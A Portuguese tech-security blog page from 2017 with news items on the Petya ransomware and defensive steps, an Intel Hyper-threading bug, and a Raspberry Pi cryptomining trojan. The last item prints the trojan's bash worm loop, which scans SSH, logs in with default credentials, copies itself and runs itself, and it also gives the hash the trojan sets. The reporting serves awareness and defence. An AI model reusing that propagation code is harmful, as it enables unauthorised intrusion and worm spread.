quinta-feira, 29 de junho de 2017

Seis passos para a empresa evitar ser vítima do Petya

Publicada em 27 de junho

No início da tarde desta terça-feira (27), mais uma vez, empresas de vários países do mundo foram infectadas por ransomwares. Desta vez, uma nova variante do ransomware Petya, chamada de Petwrap, que, assim como o WannaCry, tira proveito de uma vulnerabilidade no Windows.
Para o CEO da iBLISS Digital Security, Leonardo Militelli, a nova onda de ataques mostra que muitas empresas ainda não aprenderam a importância de contar com processos consistentes de segurança da informação, especialmente quando o assunto é a atualização de sistemas.
O gerente sênior de cibersegurança da EY, Luiz Milagres, concorda. "O principal aliado de um criminoso cibernético é a complacência. Seja uma grande multinacional ou uma empresa familiar, o sucesso de um ataque está associado às pessoas, tecnologias e procedimentos preventivos que são adotados e seguidos para reduzir o risco de sucesso dos invasores nestes cenários", diz.
E alerta que os ataques de hoje provam que os cibercriminosos estão se tornando mais agressivos e sofisticados visando simultaneamente o maior número de organizações, afirma Luiz Milagres, gerente sênior de cibersegurança da EY.
Características do ataque
O Petya vai além dos ransomwares tradicionais, pois criptografa, de uma só vez, partes inteiras do HD, impedindo que o usuário acesse até mesmo o Windows. Então exibe uma mensagem para explicar à vítima que seus arquivos estão criptografados e pede o pagamento de US$ 300 em bitcoins.

Ele tira proveito da mesma vulnerabilidade que o WannaCry usou, em maio de 2017, para infectar mais de 300 mil sistemas e servidores ao redor do mundo em apenas 72 horas, conhecida como Eternal Blue. A falha de segurança foi descoberta pela NSA e vazada por um grupo hacker conhecido como The Shadow Brokers.
De acordo com o professor Kevin Curran, membro sênior do IEEE e professor na Universidade de Ulster, o Petya lança mão de um certificado falso que geralmente é usado como uma ferramenta interna na Microsoft. Tem uma carga útil chamada PetyaWrap, que mantém o refém de dados até que os usuários paguem US $ 300 em Bitcoin. A segunda carga útil extrai nomes de usuário e senhas de computadores comprometidos e envia os dados para os atacantes. Isso garante que, enquanto um computador infectado for inoperável devido ao ransomware, os invasores ainda podem ter acesso a qualquer credencial sensível no sistema.
Uma diferença fundamental do WannaCry é que o Petya não simplesmente criptografa arquivos de disco, mas bloqueia o disco inteiro para que nada possa ser executado. Ele faz isso criptografando a tabela de arquivos mestre do sistema de arquivos para que o sistema operacional não possa recuperar arquivos.
 
Mas parece ter a mesma característica de replicação mortal do WannaCry, que permite que ele se espalhe rapidamente por uma rede interna infectando outras máquinas. Parece também encontrar senhas em cada computador infectado e usar aqueles para se espalhar também. Parece não haver nenhum interruptor de matar nesta ocasião.

O núcleo da vulnerabilidade reside em uma fraqueza na implementação do Server Message Block (SMB), que é o protocolo de transporte usado pelas máquinas Windows para uma ampla variedade de propósitos, como compartilhamento de arquivos e impressoras e acesso a serviços remotos do Windows. O ataque usa a versão SMB 1 e a porta TCP 445 para se propagar. 
A característica mais assustadora e poderosa deste malware é a capacidade de executar varreduras de rede na porta TCP 445 (SMB) e comprometer outras máquinas. O resultado é a criptografia de arquivos e a demanda de um pagamento de resgate na forma de Bitcoin. Ele também instala um backdoor persistente para acessar e executar o código em sistemas previamente comprometidos. Isso permite a instalação e ativação de software adicional, como o malware. Este novo ataque também está usando a ferramenta PsExec para espalhar a infecção executando códigos maliciosos em outros computadores.
"Este ataque possui uma tática diferente dos anteriores. Nas outras versões do ransomware, conforme pode-se perceber, havia o relógio em contagem regressiva ou uma remoção gradual de arquivos. Normalmente a maior perda eram os dados. No entanto, no caso do Petya, que altera o Master Boot Record, o risco é perder todo o sistema. Além disso, o sistema é reiniciado em um ciclo de uma hora, adicionando um outro elemento de negação de serviço ao ataque", explica Aamir Lakhani, estrategista sênior de Segurança da Fortinet.
Curiosamente, além das vulnerabilidades do Microsoft Office, o Petya usa o mesmo vetor de ataque que o WannaCry, explorando as mesmas vulnerabilidades da Microsoft que foram descobertas pelo Shadow Brokers no início deste ano. "Porém, como foram usados vetores de ataque adicionais nesta exploração, somente a correção não teria sido adequada para interromper esta exploração por completo, isso significa que a correção deve ser combinada com boas ferramentas e práticas de segurança. Os clientes da Fortinet, por exemplo, estão protegidos de todos os vetores de ataque, pois foram detectados e bloqueados pelas nossas soluções ATP, IPS e NGFW. Além disso, nossa equipe de AV emitiu uma nova assinatura de antivírus algumas horas após a descoberta para melhorar a defesa", escreve Lakhani em artigo distribuído para a imprensa.
O especialista da Fortinet lembra ainda que, de uma perspectiva financeira, o vírus Wannacry não teve muito sucesso. Gerou muito pouca receita para seus desenvolvedores, em parte porque os pesquisadores conseguiram interromper e desativar o ataque. Porém, o ataque do vírus Petya é muito mais sofisticado, embora ainda não se saiba se terá mais sucesso em termos financeiros que o ataque anterior.

ransomware
Como se defender
Apesar de a Microsoft já ter liberado um correção para o problema em todas as versões do Windows, ondas de ataques como o WannaCry e o Petya mostram que muitas empresas ainda não realizaram a instalação dos patches de segurança.

“O WannaCry e o Petya mostram que empresas no mundo todo enfrentam um problema com a atualização de sistemas. Isso acontece porque muitas acabam se dedicando mais à resolução dos incidentes do que à prevenção desse tipo de ameaça ou à mitigação dos riscos”, explica Militelli.
“A falta de processos está fazendo novas vítimas. Enquanto as empresas não tomarem consciência da real importância de contar com processos maduros de gestão de segurança, continuaremos a ver esses problemas”, explica.
Especialistas de cibersegurança da Ernst & Young orientam as empresas em todo o mundo a tomarem medidas imediatas para prevenção e mitigação do efeito desses crimes.
De acordo com eles, há seis medidas que as organizações podem tomar imediatamente para ajudar a proteger seus dados e sistemas – os ativos mais valiosos e de seus clientes - ao mesmo tempo em que minimizam os possíveis danos causados por outras ameaças:
1 - Desconecte as máquinas infectadas da rede e segregue as máquinas de backup porque também podem ficar criptografados se forem conectados à rede.
2 - Ative seu plano de resposta a incidentes e não trate a investigação como um mero problema ou exercício de TI. Reúna um time multifuncional na equipe de investigação, incluindo jurídico, compliance, segurança da informação, administrativo, relações públicas, recursos humanos e outros departamentos relevantes.
3 – Identifique as vulnerabilidades em seu sistema. Instale atualizações de segurança, detecção de malwares e detecção de vírus para dificultar recorrências e melhorar as ferramentas de detecção e resposta para futuros ataques.
4 - Certifique-se de que seus sistemas estejam corrigidos antes de reconectar os computadores. Mantenha os sistemas atualizados com um programa de gerenciamento de vulnerabilidades de alto nível. Isso deve incluir um ciclo de repetições para gerenciar vulnerabilidades com base em riscos à medida que eles evoluem e um modelo de amplo e atualizado de inventario, pontuando o nível de risco de aposição de cada item e sua conectividade com outros dispositivos.
5 – Ative o plano de continuidade do negócio. Utilize como base os requisitos necessários para relatórios regulatórios, reivindicação de seguros e disputas, litígios, inteligência de ameaças e/ou notificação de clientes.
6 – Colete e preserve as evidências, seguindo o rigor forense necessário, de maneira possam ser usadas em uma investigação.
"O sequestro de dados exige um plano de contingência e de resposta rápido. Mesmo depois que os dados são restaurados, as empresas às vezes enfrentam problemas na recuperação de informações sensíveis que foram comprometidas no ataque. Clientes, fornecedores e demais stakeholders podem exigir que a empresa demonstre de forma forense que, mesmo que os dados tenham sido acessados, nada foi perdido por completo”, alerta Sergio Kogan, gerente sênior de cibersegurança da EY.
Observar a cibersegurança como prioridade do negócio, auxilia na mitigação dos riscos das empresas no ambiente digital, permitindo conhecer o nível de exposição e riscos associados e facilitar a tomada de decisão dos executivos.
“Para prevenção e segurança dos dados é recomendável que as empresas redobrem a atenção para a criação de processos maduros, principalmente para gestão de vulnerabilidade, gestão de mudança e gestão de patches, incluindo uma revisão de processos e políticas de backup, resposta a incidentes, e continuidade de negócio, além de identificar os ativos mais importantes da empresa e monitorar de forma proativa com a realização de testes do programa de segurança com exercícios de Red Team e/ou testes de invasão. Realize um monitoramento tempestivo de infraestrutura crítica ao negócio e planos de conscientização junto aos colaboradores e faça uma gestão estratégica de cibersegurança, com processos, pessoas e tecnologias”, conclui Demétrio Carrión, sócio de cibersegurança da EY.
Pesquisa recente da EY mostra que a vulnerabilidade das empresas brasileiras é grande. A maioria não possui um programa formal de inteligência contra ameaças (81%) e não dispõem de um centro de operações de segurança (63%). Quase a metade delas já teve um incidente cibernético no ano passado (45%), mas apenas 28% aumentaram seus orçamentos no último ano.
pesquisa
Principais impactos do ataque
Até o momento, o país mais afetado pela onda de ataques do ransomware Petya foi a Ucrânia, que teve sistemas de bancos, de metrô e do aeroporto de Kiev comprometidos. Entre as empresas afetadas no país estão as fornecedoras de energia elétrica Kyivenergo e Ukrenergo, o National Bank of Ukraine (NBU), Oschadbank, e as organizações do setor de telecomunicações Kyivstar, LifeCell e Ukrtelecom. A ameaça também impactou múltiplas estações de trabalho da unidade ucraniana da empresa de mineração Evraz.

O ransomware também afetou fornecedores de energia elétrica e bancos em países como Rússia, Espanha, Reino Unido e Índia, incluindo a gigante petrolífera russa Rosneft e a empresa internacional de logística Maersk.
Outras companhias que disseram ter sido afetadas por um ataque cibernético incluem a gigante de metais russa Evraz, a empresa de materiais de construção francesa Saint Gobain, a gigante do transporte A.P. Moeller-Maersk, a gigante farmacêutica Merck & Co. e a empresa petrolífera russa Pao Rosneft relataram ataques aos seus sistemas nesta terça-feira. A agência de publicidade britânica WPP disse que seus sistemas de TI também foram interrompidos como consequência do mega-ataque. Além disso, a usina nuclear de Chernobyl também relatou que teve que monitorar os níveis de radiação manualmente depois que seus sensores baseados no Windows foram desligados.
Há poucos dados ainda sobre a quantidade de sistemas que já foram infectados pelo ransomware Petya nas últimas horas, mas especula-se que o ransomware possa ter uma extensão maior que a do WannaCry.
Pesquisadores de segurança da Kaspersky Lab dizem ter registrado mais de 45 mil ataques em 99 países, incluindo Reino Unido, Rússia, Ucrânia, Índia, China, Itália e Egito. Na Espanha, as grandes empresas, incluindo a operadora de telefonia Telefónica, foram infectadas. Mas não está claro ainda se os ataques foram relacionados, mas eles se espalharam simultaneamente em um ataque global que já pode ser considerado maior que o provocado pelo WannaCry. Especula-se também que o ransomware pode ter origem no roubo de "ciberarmas" do governo norte-americano.
Segundo o jornal britânico The Guardian, na noite de sexta-feira, 23, o ransomware se espalhou para os Estados Unidos e América do Sul.

Descoberta falha no Hyper-threading de CPUs Skylake e Kaby Lake

Por 
Em 26/06/2017 no site Adrenaline


Uma falha no funcionamento da tecnologia Hyper-threading (HT) está afetando processadores Intel Core de 6ª e 7ª Geração, codinomes Skylake e Kaby Lake. A falha foi detectada por desenvolvedores do sistema Debian, e o relatório está disponível nesse link. Apesar de descoberta pela comunidade de desenvolvimento do sistema Linux, a falha pode atingir todos os sistemas operacionais.
O motivo da falha seria um problema do processador em lidar com algumas instruções, gerando comportamentos impossíveis de predizer. Essa falha parece acontecer apenas quando há dois núcleos lógicos por núcleo físico, tecnologia chamada de Hyper-threading pela Intel. O relatório sugere desabilitar temporariamente o recurso, já que a correção depende de correções por parte da própria Intel.

Funcionamento do Hyper-Threading
Antes de ficar alarmado, é preciso entender que as condições que causam o problema são bastante específicas, e não deve afetar a maioria dos consumidores domésticos. A falha pode levar a travamentos no sistema e perdas de dados, porém é pouco provável que vá atingir seu PC (caso possua um Intel Skylake ou Kaby Lake com HT). O problema foi identificado inicialmente em falhas do compilador OCaml, então se você estiver usando essa linguagem de programação com especificamente um desses hardwares, talvez seja por isso que aquele erro se recusa a ser resolvido.
O principal inconveniente dessa falha é que além de ajustes no microcódigo do processador por parte da Intel, será necessária também uma atualização no BIOS/UEFI, o que irá depender também das fabricantes de placas-mãe, tornado o imbróglio um tanto maior.

Malware Linux foca em equipamentos Raspberry Pi para mineração de CryptoCurrency

PorDiego Boot em


Resultado de imagem para malware
Computer Business Review

Pesquisadores de malware do fabricante de antivírus russo Dr. Web descobriram um novo Trojan para Linux, rastreado como KinuX.MulDrop.14, que está infectando dispositivos Raspberry Pi com a finalidade de minerar cryptocurrency. De acordo com a Dr. Web, o malware foi visto pela primeira vez online em maio; os pesquisadores descobriram um script contendo um aplicação compactada e criptografada.
O malware KinuX.MulDrop.14 tem como alvo dispositivos Raspberry Pi não protegidos que possuem portas SSH abertas para conexões externas.
Uma vez que o malware infecta o dispositivo, ele irá primeiro alterar a senha da conta “pi” para:
1\$6\$U1Nu9qCp\$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1
Em seguida, o malware desliga vários processos e instala bibliotecas como ZMap e SSHPass que ele usa para suas operações.
“O Trojan Linux que é um script bash contendo um programa de mineração, que é compactado com gzip e criptografado com base64. Uma vez iniciado, o script encerra vários processos e instala bibliotecas necessárias para sua operação”, afirmou a análise publicada pela Dr Web.
Ele muda a senha do usuário “pi” para “\$6\$U1Nu9qCp\$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1”
O malware, em seguida, inicia um processo de mineração cryptocurrency, mas usa o ZMap para digitalizar a Internet para infectar outros dispositivos.
Toda vez que o malware encontra um dispositivo de Raspberry Pi na Internet, ele usa o sshpass para tentar fazer logon usando o nome de usuário padrão “pi” e a senha “raspiberry”.
O código malicioso só tenta usar esse par de valores. Isso sugere que o malware alveja apenas dispositivos Raspberry Pi. Especialistas acreditam que o malware poderia ser melhorado e que pode ser usado nas próximas semanas para atingir outras plataformas.
Abaixo vemos parte do código compartilhado pela Dr. Web:
1NAME=`mktemp -u 'XXXXXXXX'`
2while [ true ]; do
3FILE=`mktemp`
4zmap -p 22 -o $FILE -n 100000
5killall ssh scp
6for IP in `cat $FILE`
7do
8sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /tmp/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
9done
10rm -rf $FILE
11sleep 10
12done
Os pesquisadores também analisaram um segundo malware para Linux, apelidado de Linux.ProxyM que foi usado para criar uma rede proxy.
O código malicioso inicia um servidor proxy SOCKS em dispositivos infectados usados para retransmitir o tráfego malicioso, disfarçando sua real fonte.
“O outro Trojan foi nomeado de Linux.ProxyM. ataques envolvendo este trojan foram observados desde Fevereiro de 2017, mas atingiram o pico no final de Maio. O gráfico abaixo mostra quantos ataques foram feitas pelo Linux.ProxyM e identificados pelos especialistas da Doctor Web”, afirmou a Dr. Web.
De acordo com a Dr. Web, o número de dispositivos infectados com o Linux.ProxyM atingiu 10 mil unidades desde a sua descoberta em fevereiro de 2017.